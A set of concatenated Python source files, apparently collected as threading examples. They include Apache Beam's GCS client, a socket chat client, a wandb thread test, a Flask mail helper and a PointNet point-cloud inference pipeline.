callback()
def update_builtin_blacklist(
force: bool = False, background: bool = True,
callback: Callable = None) -> Optional[Thread]:
"""
Update and reload the built-in blacklist. Return the `Thread` used
to do the background update, so it can be `join()`-ed.
"""
LOGGER.info(msg='Starting optional update of built-in blacklist.')
blacklist_updater = BlacklistUpdater()
kwargs = dict(force=force, callback=callback)
if not background:
blacklist_updater.process(**kwargs)
return
bl_thread = Thread(target=blacklist_updater.process, kwargs=kwargs)
bl_thread.start()
return bl_thread
|
gcsio.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Google Cloud Storage client.
This library evolved from the Google App Engine GCS client available at
https://github.com/GoogleCloudPlatform/appengine-gcs-client.
"""
# pytype: skip-file
from __future__ import absolute_import
import errno
import io
import logging
import multiprocessing
import re
import sys
import threading
import time
import traceback
from builtins import object
from apache_beam.internal.http_client import get_new_http
from apache_beam.io.filesystemio import Downloader
from apache_beam.io.filesystemio import DownloaderStream
from apache_beam.io.filesystemio import PipeStream
from apache_beam.io.filesystemio import Uploader
from apache_beam.io.filesystemio import UploaderStream
from apache_beam.utils import retry
__all__ = ['GcsIO']
_LOGGER = logging.getLogger(__name__)
# Issue a friendlier error message if the storage library is not available.
# TODO(silviuc): Remove this guard when storage is available everywhere.
try:
# pylint: disable=wrong-import-order, wrong-import-position
# pylint: disable=ungrouped-imports
import apitools.base.py.transfer as transfer
from apitools.base.py.batch import BatchApiRequest
from apitools.base.py.exceptions import HttpError
from apache_beam.internal.gcp import auth
from apache_beam.io.gcp.internal.clients import storage
except ImportError:
raise ImportError(
'Google Cloud Storage I/O not supported for this execution environment '
'(could not import storage API client).')
# This is the size of each partial-file read operation from GCS. This
# parameter was chosen to give good throughput while keeping memory usage at
# a reasonable level; the following table shows throughput reached when
# reading files of a given size with a chosen buffer size and informed the
# choice of the value, as of 11/2016:
#
# +---------------+------------+-------------+-------------+-------------+
# | | 50 MB file | 100 MB file | 200 MB file | 400 MB file |
# +---------------+------------+-------------+-------------+-------------+
# | 8 MB buffer | 17.12 MB/s | 22.67 MB/s | 23.81 MB/s | 26.05 MB/s |
# | 16 MB buffer | 24.21 MB/s | 42.70 MB/s | 42.89 MB/s | 46.92 MB/s |
# | 32 MB buffer | 28.53 MB/s | 48.08 MB/s | 54.30 MB/s | 54.65 MB/s |
# | 400 MB buffer | 34.72 MB/s | 71.13 MB/s | 79.13 MB/s | 85.39 MB/s |
# +---------------+------------+-------------+-------------+-------------+
DEFAULT_READ_BUFFER_SIZE = 16 * 1024 * 1024
# This is the number of seconds the library will wait for a partial-file read
# operation from GCS to complete before retrying.
DEFAULT_READ_SEGMENT_TIMEOUT_SECONDS = 60
# This is the size of chunks used when writing to GCS.
WRITE_CHUNK_SIZE = 8 * 1024 * 1024
# Maximum number of operations permitted in GcsIO.copy_batch() and
# GcsIO.delete_batch().
MAX_BATCH_OPERATION_SIZE = 100
# Batch endpoint URL for GCS.
# We have to specify an API specific endpoint here since Google APIs global
# batch endpoints will be deprecated on 03/25/2019.
# See https://developers.googleblog.com/2018/03/discontinuing-support-for-json-rpc-and.html. # pylint: disable=line-too-long
# Currently apitools library uses a global batch endpoint by default:
# https://github.com/google/apitools/blob/master/apitools/base/py/batch.py#L152
# TODO: remove this constant and it's usage after apitools move to using an API
# specific batch endpoint or after Beam gcsio module start using a GCS client
# library that does not use global batch endpoints.
GCS_BATCH_ENDPOINT = 'https://www.googleapis.com/batch/storage/v1'
def parse_gcs_path(gcs_path, object_optional=False):
"""Return the bucket and object names of the given gs:// path."""
match = re.match('^gs://([^/]+)/(.*)$', gcs_path)
if match is None or (match.group(2) == '' and not object_optional):
raise ValueError('GCS path must be in the form gs://<bucket>/<object>.')
return match.group(1), match.group(2)
class GcsIOError(IOError, retry.PermanentException):
"""GCS IO error that should not be retried."""
pass
class GcsIO(object):
"""Google Cloud Storage I/O client."""
def __init__(self, storage_client=None):
if storage_client is None:
storage_client = storage.StorageV1(
credentials=auth.get_service_credentials(),
get_credentials=False,
http=get_new_http(),
response_encoding=None if sys.version_info[0] < 3 else 'utf8')
self.client = storage_client
self._rewrite_cb = None
def _set_rewrite_response_callback(self, callback):
"""For testing purposes only. No backward compatibility guarantees.
Args:
callback: A function that receives ``storage.RewriteResponse``.
"""
self._rewrite_cb = callback
def open(
self,
filename,
mode='r',
read_buffer_size=DEFAULT_READ_BUFFER_SIZE,
mime_type='application/octet-stream'):
"""Open a GCS file path for reading or writing.
Args:
filename (str): GCS file path in the form ``gs://<bucket>/<object>``.
mode (str): ``'r'`` for reading or ``'w'`` for writing.
read_buffer_size (int): Buffer size to use during read operations.
mime_type (str): Mime type to set for write operations.
Returns:
GCS file object.
Raises:
ValueError: Invalid open file mode.
"""
if mode == 'r' or mode == 'rb':
downloader = GcsDownloader(
self.client, filename, buffer_size=read_buffer_size)
return io.BufferedReader(
DownloaderStream(
downloader, read_buffer_size=read_buffer_size, mode=mode),
buffer_size=read_buffer_size)
elif mode == 'w' or mode == 'wb':
uploader = GcsUploader(self.client, filename, mime_type)
return io.BufferedWriter(
UploaderStream(uploader, mode=mode), buffer_size=128 * 1024)
else:
raise ValueError('Invalid file open mode: %s.' % mode)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def delete(self, path):
"""Deletes the object at the given GCS path.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
try:
self.client.objects.Delete(request)
except HttpError as http_error:
if http_error.status_code == 404:
# Return success when the file doesn't exist anymore for idempotency.
return
raise
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def delete_batch(self, paths):
"""Deletes the objects at the given GCS paths.
Args:
paths: List of GCS file path patterns in the form gs://<bucket>/<name>,
not to exceed MAX_BATCH_OPERATION_SIZE in length.
Returns: List of tuples of (path, exception) in the same order as the paths
argument, where exception is None if the operation succeeded or
the relevant exception if the operation failed.
"""
if not paths:
return []
batch_request = BatchApiRequest(
batch_url=GCS_BATCH_ENDPOINT,
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES,
response_encoding='utf-8')
for path in paths:
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
batch_request.Add(self.client.objects, 'Delete', request)
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
result_statuses = []
for i, api_call in enumerate(api_calls):
path = paths[i]
exception = None
if api_call.is_error:
exception = api_call.exception
# Return success when the file doesn't exist anymore for idempotency.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = None
result_statuses.append((path, exception))
return result_statuses
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def copy(
self,
src,
dest,
dest_kms_key_name=None,
max_bytes_rewritten_per_call=None):
"""Copies the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
dest_kms_key_name: Experimental. No backwards compatibility guarantees.
Encrypt dest with this Cloud KMS key. If None, will use dest bucket
encryption defaults.
max_bytes_rewritten_per_call: Experimental. No backwards compatibility
guarantees. Each rewrite API call will return after these many bytes.
Used for testing.
Raises:
TimeoutError: on timeout.
"""
src_bucket, src_path = parse_gcs_path(src)
dest_bucket, dest_path = parse_gcs_path(dest)
request = storage.StorageObjectsRewriteRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path,
destinationKmsKeyName=dest_kms_key_name,
maxBytesRewrittenPerCall=max_bytes_rewritten_per_call)
response = self.client.objects.Rewrite(request)
while not response.done:
_LOGGER.debug(
'Rewrite progress: %d of %d bytes, %s to %s',
response.totalBytesRewritten,
response.objectSize,
src,
dest)
request.rewriteToken = response.rewriteToken
response = self.client.objects.Rewrite(request)
if self._rewrite_cb is not None:
self._rewrite_cb(response)
_LOGGER.debug('Rewrite done: %s to %s', src, dest)
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def copy_batch(
self,
src_dest_pairs,
dest_kms_key_name=None,
max_bytes_rewritten_per_call=None):
"""Copies the given GCS object from src to dest.
Args:
src_dest_pairs: list of (src, dest) tuples of gs://<bucket>/<name> files
paths to copy from src to dest, not to exceed
MAX_BATCH_OPERATION_SIZE in length.
dest_kms_key_name: Experimental. No backwards compatibility guarantees.
Encrypt dest with this Cloud KMS key. If None, will use dest bucket
encryption defaults.
max_bytes_rewritten_per_call: Experimental. No backwards compatibility
guarantees. Each rewrite call will return after these many bytes. Used
primarily for testing.
Returns: List of tuples of (src, dest, exception) in the same order as the
src_dest_pairs argument, where exception is None if the operation
succeeded or the relevant exception if the operation failed.
"""
if not src_dest_pairs:
return []
pair_to_request = {}
for pair in src_dest_pairs:
src_bucket, src_path = parse_gcs_path(pair[0])
dest_bucket, dest_path = parse_gcs_path(pair[1])
request = storage.StorageObjectsRewriteRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path,
destinationKmsKeyName=dest_kms_key_name,
maxBytesRewrittenPerCall=max_bytes_rewritten_per_call)
pair_to_request[pair] = request
pair_to_status = {}
while True:
pairs_in_batch = list(set(src_dest_pairs) - set(pair_to_status))
if not pairs_in_batch:
break
batch_request = BatchApiRequest(
batch_url=GCS_BATCH_ENDPOINT,
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES,
response_encoding='utf-8')
for pair in pairs_in_batch:
batch_request.Add(self.client.objects, 'Rewrite', pair_to_request[pair])
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
for pair, api_call in zip(pairs_in_batch, api_calls):
src, dest = pair
response = api_call.response
if self._rewrite_cb is not None:
self._rewrite_cb(response)
if api_call.is_error:
exception = api_call.exception
# Translate 404 to the appropriate not found exception.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = (
GcsIOError(errno.ENOENT, 'Source file not found: %s' % src))
pair_to_status[pair] = exception
elif not response.done:
_LOGGER.debug(
'Rewrite progress: %d of %d bytes, %s to %s',
response.totalBytesRewritten,
response.objectSize,
src,
dest)
pair_to_request[pair].rewriteToken = response.rewriteToken
else:
_LOGGER.debug('Rewrite done: %s to %s', src, dest)
pair_to_status[pair] = None
return [(pair[0], pair[1], pair_to_status[pair]) for pair in src_dest_pairs]
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def copytree(self, src, dest):
"""Renames the given GCS "directory" recursively from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>/.
dest: GCS file path pattern in the form gs://<bucket>/<name>/.
"""
assert src.endswith('/')
assert dest.endswith('/')
for entry in self.list_prefix(src):
rel_path = entry[len(src):]
self.copy(entry, dest + rel_path)
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def rename(self, src, dest):
"""Renames the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
"""
self.copy(src, dest)
self.delete(src)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def exists(self, path):
"""Returns whether the given GCS object exists.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
try:
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
self.client.objects.Get(request) # metadata
return True
except HttpError as http_error:
if http_error.status_code == 404:
# HTTP 404 indicates that the file did not exist
return False
else:
# We re-raise all other exceptions
raise
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def checksum(self, path):
"""Looks up the checksum of a GCS object.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).crc32c
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def size(self, path):
"""Returns the size of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: size of the GCS object in bytes.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).size
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def kms_key(self, path):
"""Returns the KMS key of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: KMS key name of the GCS object as a string, or None if it doesn't
have one.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).kmsKeyName
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def last_updated(self, path):
"""Returns the last updated epoch time of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: last updated time of the GCS object in second.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
datetime = self.client.objects.Get(request).updated
return (
time.mktime(datetime.timetuple()) - time.timezone +
datetime.microsecond / 1000000.0)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def list_prefix(self, path):
"""Lists files matching the prefix.
Args:
path: GCS file path pattern in the form gs://<bucket>/[name].
Returns:
Dictionary of file name -> size.
"""
bucket, prefix = parse_gcs_path(path, object_optional=True)
request = storage.StorageObjectsListRequest(bucket=bucket, prefix=prefix)
file_sizes = {}
counter = 0
start_time = time.time()
_LOGGER.info("Starting the size estimation of the input")
while True:
response = self.client.objects.List(request)
for item in response.items:
file_name = 'gs://%s/%s' % (item.bucket, item.name)
file_sizes[file_name] = item.size
counter += 1
if counter % 10000 == 0:
_LOGGER.info("Finished computing size of: %s files", len(file_sizes))
if response.nextPageToken:
request.pageToken = response.nextPageToken
else:
break
_LOGGER.info(
"Finished listing %s files in %s seconds.",
counter,
time.time() - start_time)
return file_sizes
class GcsDownloader(Downloader):
def __init__(self, client, path, buffer_size):
self._client = client
self._path = path
self._bucket, self._name = parse_gcs_path(path)
self._buffer_size = buffer_size
# Get object state.
self._get_request = (
storage.StorageObjectsGetRequest(
bucket=self._bucket, object=self._name))
try:
metadata = self._get_object_metadata(self._get_request)
except HttpError as http_error:
if http_error.status_code == 404:
raise IOError(errno.ENOENT, 'Not found: %s' % self._path)
else:
_LOGGER.error(
'HTTP error while requesting file %s: %s', self._path, http_error)
raise
self._size = metadata.size
# Ensure read is from file of the correct generation.
self._get_request.generation = metadata.generation
# Initialize read buffer state.
self._download_stream = io.BytesIO()
self._downloader = transfer.Download(
self._download_stream,
auto_transfer=False,
chunksize=self._buffer_size,
num_retries=20)
self._client.objects.Get(self._get_request, download=self._downloader)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def _get_object_metadata(self, get_request):
return self._client.objects.Get(get_request)
@property
def size(self):
return self._size
def get_range(self, start, end):
self._download_stream.seek(0)
self._download_stream.truncate(0)
self._downloader.GetRange(start, end - 1)
return self._download_stream.getvalue()
class GcsUploader(Uploader):
def __init__(self, client, path, mime_type):
self._client = client
self._path = path
self._bucket, self._name = parse_gcs_path(path)
self._mime_type = mime_type
# Set up communication with child thread.
parent_conn, child_conn = multiprocessing.Pipe()
self._child_conn = child_conn
self._conn = parent_conn
# Set up uploader.
self._insert_request = (
storage.StorageObjectsInsertRequest(
bucket=self._bucket, name=self._name))
self._upload = transfer.Upload(
PipeStream(self._child_conn),
self._mime_type,
chunksize=WRITE_CHUNK_SIZE)
self._upload.strategy = transfer.RESUMABLE_UPLOAD
# Start uploading thread.
self._upload_thread = threading.Thread(target=self._start_upload)
self._upload_thread.daemon = True
self._upload_thread.last_error = None
self._upload_thread.start()
# TODO(silviuc): Refactor so that retry logic can be applied.
# There is retry logic in the underlying transfer library but we should make
# it more explicit so we can control the retry parameters.
@retry.no_retries # Using no_retries marks this as an integration point.
def _start_upload(self):
# This starts the uploader thread. We are forced to run the uploader in
# another thread because the apitools uploader insists on taking a stream
# as input. Happily, this also means we get asynchronous I/O to GCS.
#
# The uploader by default transfers data in chunks of 1024 * 1024 bytes at
# a time, buffering writes until that size is reached.
try:
self._client.objects.Insert(self._insert_request, upload=self._upload)
except Exception as e: # pylint: disable=broad-except
_LOGGER.error(
'Error in _start_upload while inserting file %s: %s',
self._path,
traceback.format_exc())
self._upload_thread.last_error = e
finally:
self._child_conn.close()
def put(self, data):
try:
self._conn.send_bytes(data.tobytes())
except EOFError:
if self._upload_thread.last_error is not None:
raise self._upload_thread.last_error # pylint: disable=raising-bad-type
raise
def finish(self):
self._conn.close()
# TODO(udim): Add timeout=DEFAULT_HTTP_TIMEOUT_SECONDS * 2 and raise if
# isAlive is True.
self._upload_thread.join()
# Check for exception since the last put() call.
if self._upload_thread.last_error is not None:
raise self._upload_thread.last_error # pylint: disable=raising-bad-type
|
client.py
|
import socket
import sys
import time
import threading
x=socket.socket()
h_name= input(str("Enter the hostname of the server: "))
port= 1234
x.connect((h_name,port))
print("Connected to chat server")
print("You can now start sending messages")
def recv():
while 1:
incoming_message=x.recv(1024)
print("Server: ", incoming_message.decode())
def send():
while 1:
message= input(str())
Message =message.encode()
x.send(Message)
threading.Thread(target=recv).start()
threading.Thread(target=send).start()
|
multi_threading_test.py
|
import threading
import wandb
# Checks if wandb has issues during set up in a multithreaded environment
def thread_test(n):
run = wandb.init(project="threadtest")
run.log({"thread": n})
def main():
try:
threads = []
for i in range(2):
threads.append(threading.Thread(target=thread_test, args=(i,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
except Exception as e:
print(e)
print("Issue with calling wandb init in a multithreaded situation")
raise AssertionError(
"Issue with calling wandb init in a multithreaded situation"
)
if __name__ == "__main__":
main()
|
emails.py
|
import os
from threading import Thread
from flask_mail import Message
from app import app, mail
def send_async_mail(app, msg):
with app.app_context():
mail.send(msg)
def mail_send(subject, recipients, text_body):
msg = Message(
subject, sender=os.environ.get("MAIL_DEFAULT_SENDER"), recipients=recipients
)
msg.body = text_body
thr = Thread(target=send_async_mail, args=[app, msg])
thr.start()
|
inference.py
|
import argparse
import copy
from datetime import datetime
from enum import Enum
import glob
import importlib
import json
import logging
import math
import numpy as np
import os
import pickle
from pointset import PointSet
import pprint
from queue import Queue
import subprocess
import sys
import tempfile
import tensorflow as tf
import threading
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(BASE_DIR) # model
sys.path.append(os.path.join(ROOT_DIR, 'models')) # no, really model
sys.path.append(ROOT_DIR) # provider
sys.path.append(os.path.join(ROOT_DIR, 'utils'))
import provider
import tf_util
import pc_util
class InputType(Enum):
TXT='TXT'
LAS='LAS'
class OutputType(Enum):
LABELS='LABELS'
LAS='LAS'
BOTH='BOTH'
def __str__(self):
return self.value
def parse_args(argv):
# Setup arguments & parse
parser = argparse.ArgumentParser(
description=__doc__, # printed with -h/--help
# Don't mess with format of description
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('--gpu', type=int, default=0, help='GPU to use [default: GPU 0]')
parser.add_argument('--model', default='pointnet2_sem_seg', help='Model name [default: pointnet2_sem_seg]')
parser.add_argument('--extra-dims', type=int, default=[], nargs='*', help='Extra dims')
parser.add_argument('--model_path', default='data/results/scannet/log/model.ckpt', help='model checkpoint file path [default: log/model.ckpt]')
parser.add_argument('--num_point', type=int, default=8192, help='Point Number [default: 8192]')
parser.add_argument('--batch_size', type=int, default=16, help='Batch Size during inference [default: 16]')
parser.add_argument('--n_angles', type=int, default=3, help='Number of angles to use to sample image with')
parser.add_argument('--input_path', required=True, help='Input point clouds path')
parser.add_argument('--input_type', type=InputType, choices=list(InputType), default=InputType.TXT)
parser.add_argument('--output_path', required=True, help='Output path')
parser.add_argument('--output_type', type=OutputType, choices=list(OutputType), default=OutputType.LABELS)
return parser.parse_args(argv[1:])
def start_log(opts):
if not os.path.exists(opts.output_path):
os.makedirs(opts.output_path)
rootLogger = logging.getLogger()
logFormatter = logging.Formatter("%(asctime)s %(threadName)s[%(levelname)-3.3s] %(message)s")
fileHandler = logging.FileHandler(os.path.join(opts.output_path,os.path.splitext(os.path.basename(__file__))[0]+'.log'),mode='w')
fileHandler.setFormatter(logFormatter)
fileHandler.setLevel(logging.DEBUG)
rootLogger.addHandler(fileHandler)
logFormatter = logging.Formatter("%(threadName)s[%(levelname)-3.3s] %(message)s")
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
consoleHandler.setLevel(logging.INFO)
rootLogger.addHandler(consoleHandler)
rootLogger.level=logging.DEBUG
logging.debug('Options:\n'+pprint.pformat(opts.__dict__))
# Set global variables
FLAGS = parse_args(sys.argv)
start_log(FLAGS)
EPOCH_CNT = 0
BATCH_SIZE = FLAGS.batch_size
NUM_POINT = FLAGS.num_point
GPU_INDEX = FLAGS.gpu
MODEL_PATH = FLAGS.model_path
MODEL = importlib.import_module(FLAGS.model) # import network module
MODEL_FILE = os.path.join(ROOT_DIR, 'models', FLAGS.model+'.py')
os.system('cp %s %s' % (MODEL_FILE, FLAGS.output_path)) # bkp of model def
os.system('cp '+__file__+' %s' % (FLAGS.output_path)) # bkp of train procedure
NUM_CLASSES = 6
COLUMNS = np.array([0,1,2]+FLAGS.extra_dims)
NUM_DIMENSIONS = len(COLUMNS)
with open(os.path.join(os.path.dirname(FLAGS.model_path),'dfc_train_metadata.pickle'),'rb') as f:
METADATA = pickle.load(f)
SCALE = np.sqrt(METADATA['variance'])
SCALE[0:3] = np.sqrt(np.mean(np.square(SCALE[0:3])))
LABEL_MAP = METADATA['decompress_label_map']
def inference():
# Generate list of files
if FLAGS.input_type is InputType.TXT:
files = glob.glob(os.path.join(FLAGS.input_path,"*.txt"))
elif FLAGS.input_type is InputType.LAS:
files = glob.glob(os.path.join(FLAGS.input_path,"*.las"))
# Setup queues
input_queue = Queue(maxsize=3)
output_queue = Queue(maxsize=3)
# Note: this threading implementation could be setup more efficiently, but it's about 2x faster than a non-threaded version.
logging.info('Starting threads')
pre_proc = threading.Thread(target=pre_processor,name='Pre-ProcThread',args=(sorted(files),input_queue))
pre_proc.start()
main_proc = threading.Thread(target=main_processor,name='MainProcThread',args=(input_queue,output_queue))
main_proc.start()
post_proc = threading.Thread(target=post_processor,name='PostProcThread',args=(output_queue,))
post_proc.start()
logging.debug('Waiting for threads to finish')
pre_proc.join()
logging.debug('Joined pre-processing thread')
main_proc.join()
logging.debug('Joined main processing thread')
post_proc.join()
logging.debug('Joined post-processing thread')
logging.info('Done')
def prep_pset(pset):
data64 = np.stack([pset.x,pset.y,pset.z,pset.i,pset.r],axis=1)
offsets = np.mean(data64[:,COLUMNS],axis=0)
data = (data64[:,COLUMNS]-offsets).astype('float32')
n = len(pset.x)
if NUM_POINT < n:
ixs = np.random.choice(n,NUM_POINT,replace=False)
elif NUM_POINT == n:
ixs = np.arange(NUM_POINT)
else:
ixs = np.random.choice(n,NUM_POINT,replace=True)
return data64[ixs,:], data[ixs,:] / SCALE[COLUMNS]
def get_batch(dataset, start_idx, end_idx):
bsize = end_idx-start_idx
rsize = min(end_idx,len(dataset))-start_idx
batch_raw = np.zeros((rsize, NUM_POINT, 5), dtype=np.float64)
batch_data = np.zeros((bsize, NUM_POINT, NUM_DIMENSIONS), dtype=np.float32)
for i in range(rsize):
pset = dataset[start_idx+i]
batch_raw[i,...], batch_data[i,...] = prep_pset(pset)
return batch_raw, batch_data
def pre_processor(files, input_queue):
for file in files:
logging.info('Loading {}'.format(file))
pset = PointSet(file)
psets = pset.split()
num_batches = int(math.ceil((1.0*len(psets))/BATCH_SIZE))
data = []
for batch_idx in range(num_batches):
start_idx = batch_idx * BATCH_SIZE
end_idx = (batch_idx+1) * BATCH_SIZE
for k in range(FLAGS.n_angles):
batch_raw, batch_data = get_batch(psets, start_idx, end_idx)
if k == 0:
aug_data = batch_data
else:
ang = (1.0*k)/(1.0*FLAGS.n_angles) * 2 * np.pi
if FLAGS.extra_dims:
aug_data = np.concatenate((provider.rotate_point_cloud_z(batch_data[:,:,0:3],angle=ang),
batch_data[:,:,3:]),axis=2)
else:
aug_data = provider.rotate_point_cloud_z(batch_data)
data.append((batch_raw,aug_data))
logging.debug('Adding {} to queue'.format(file))
input_queue.put((pset,data))
logging.debug('Added {} to queue'.format(file))
logging.info('Pre-processing finished')
input_queue.put(None)
logging.debug('Pre-processing thread finished')
def main_processor(input_queue, output_queue):
with tf.Graph().as_default():
with tf.device('/device:GPU:'+str(GPU_INDEX)):
pointclouds_pl, labels_pl, smpws_pl = MODEL.placeholder_inputs(BATCH_SIZE, NUM_POINT)
is_training_pl = tf.placeholder(tf.bool, shape=())
logging.info("Loading model")
pred, end_points = MODEL.get_model(pointclouds_pl, is_training_pl, NUM_CLASSES)
saver = tf.train.Saver()
# Create a session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.allow_soft_placement = True
sess = tf.Session(config=config)
# Restore variables from disk.
saver.restore(sess, MODEL_PATH)
ops = {'pointclouds_pl': pointclouds_pl,
'is_training_pl': is_training_pl,
'pred': pred}
is_training = False
logging.info("Model loaded")
while True:
in_data = input_queue.get()
if in_data is None:
break
logging.info('Processing {}'.format(in_data[0].filename))
batch_list = in_data[1]
for k in range(len(batch_list)):
batch_raw = batch_list[k][0]
aug_data = batch_list[k][1]
feed_dict = {ops['pointclouds_pl']: aug_data,
ops['is_training_pl']: is_training}
pred_val = sess.run([ops['pred']], feed_dict=feed_dict)
pred_labels = np.argmax(pred_val[0], 2) # BxN
# subset to true batch size as necessary
if batch_raw.shape[0] != BATCH_SIZE:
pred_labels = pred_labels[0:batch_raw.shape[0],:]
# Reshape pred_labels and batch_raw to (BxN,1) and (BxN,5) respectively (i.e. concatenate all point sets in batch together)
pred_labels.shape = (pred_labels.shape[0]*pred_labels.shape[1])
batch_raw.shape = (batch_raw.shape[0]*batch_raw.shape[1],batch_raw.shape[2])
if k==0:
all_labels = pred_labels
all_points = batch_raw
else:
# Concatenate all pointsets across all batches together
all_labels = np.concatenate((all_labels,pred_labels),axis=0)
all_points = np.concatenate((all_points,batch_raw),axis=0)
logging.debug('Adding {} to output queue'.format(in_data[0].filename))
output_queue.put((in_data[0],all_points,all_labels))
logging.debug('Added {} to output queue'.format(in_data[0].filename))
input_queue.task_done()
logging.info('Main processing finished')
output_queue.put(None)
logging.debug('Main processing thread finished')
def post_processor(output_queue):
while True:
out_data = output_queue.get()
if out_data is None:
break
pset = out_data[0]
all_points = out_data[1]
all_labels = out_data[2]
logging.info('Post-processing {}'.format(pset.filename))
with tempfile.TemporaryDirectory() as tmpdir:
# Save pset to temp file
ipath = os.path.join(tmpdir,pset.filename+'_original.las')
pset.save(ipath)
# Update pset points
pset.x = all_points[:,0]
pset.y = all_points[:,1]
pset.z = all_points[:,2]
pset.i = all_points[:,3]
pset.r = all_points[:,4]
pset.c = np.array([LABEL_MAP[v] for v in all_labels],dtype='uint8')
# Save all classed points to a new file
cpath = os.path.join(tmpdir,pset.filename+'_candidates.las')
pset.save(cpath)
if FLAGS.output_type is OutputType.LABELS:
opath = os.path.join(tmpdir,pset.filename+'.las')
else:
opath = os.path.join(FLAGS.output_path,pset.filename+'.las')
# Run nearest neighbor voting algorithm to classify original points (pdal pipeline):
pipeline = {'pipeline':[
ipath,
{'type':'filters.neighborclassifier','k':FLAGS.n_angles*4+1,'candidate':cpath}, # Note: number of votes is FLAGS.n_angles*4+1, where 4 comes from splitting the point cloud (nominal number of overlapping subtiles per point before rotations)
opath]}
p = subprocess.run(['/opt/conda/envs/cpdal-run/bin/pdal','pipeline','-s'],input=json.dumps(pipeline).encode())
if p.returncode:
raise ValueError('Failed to run pipeline: \n"'+json.dumps(pipeline)+'"')
if not FLAGS.output_type is OutputType.LAS:
# Load in updated point cloud, save classification file
pset2 = PointSet(opath)
pset2.save_classifications_txt(os.path.join(FLAGS.output_path,pset.filename+'_CLS.txt'))
output_queue.task_done()
logging.debug('Finished {}'.format(pset.filename))
logging.debug('Post-processing thread finished')
if __name__ == "__main__":
inference()
|
main.py
|
##################################################################################
# #
# Copyright (c) 2020 AECgeeks #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy #
# of this software and associated documentation files (the "Software"), to deal #
# in the Software without restriction, including without limitation the rights #
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #
# copies of the Software, and to permit persons to whom the Software is #
# furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all #
# copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
